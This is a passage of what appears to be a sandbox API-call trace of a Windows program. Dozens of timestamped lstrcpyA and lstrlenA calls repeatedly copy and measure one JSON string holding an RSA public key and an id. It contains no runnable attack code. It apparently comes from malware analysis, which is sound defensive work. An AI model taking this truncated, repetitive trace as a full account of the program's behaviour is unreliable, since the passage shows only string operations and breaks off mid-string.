KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0172.394] lstrcpyA (in: lpString1=0x90ca778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.395] lstrlenA (lpString="-----BEGIN PUBLIC 